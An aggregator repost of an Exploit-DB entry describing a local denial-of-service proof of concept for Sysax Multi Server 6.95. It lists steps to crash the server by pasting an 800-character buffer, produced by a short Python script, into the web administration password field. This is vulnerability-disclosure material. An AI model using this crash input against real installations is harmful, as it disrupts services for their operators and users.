4

[dos] Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC)

 1 year ago
source link: https://www.exploit-db.com/exploits/51066
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC)

EDB-ID:

51066

EDB Verified:

Exploit:

  /  

Platform:

Windows

Date:

2023-03-27

Vulnerable App:

# Exploit Title: Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2022-10-05
# Vendor Homepage: https://www.sysax.com/
# Software Link: https://www.sysax.com/download/sysaxserv_setup.msi
# Tested Version: 6.95
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash:
# 1.- Run python code: Sysax_Multi_Server_6.95.py
# 2.- Open Sysax_Multi_Server_6.95.txt and copy content to clipboard
# 3.- Open "Sysax Multi Server"
# 4.- Manage Server Settings...
# 5.- Administrative Settings -> Configure...
# 6.- Clic "Enable web based administration and API access"
# 7.- Login -> admin
# 8.- Paste ClipBoard on "Password"
# 9.- Save
# 10.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 800
f = open ("Sysax_Multi_Server_6.95.txt", "w")
f.write(buffer)
f.close()

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK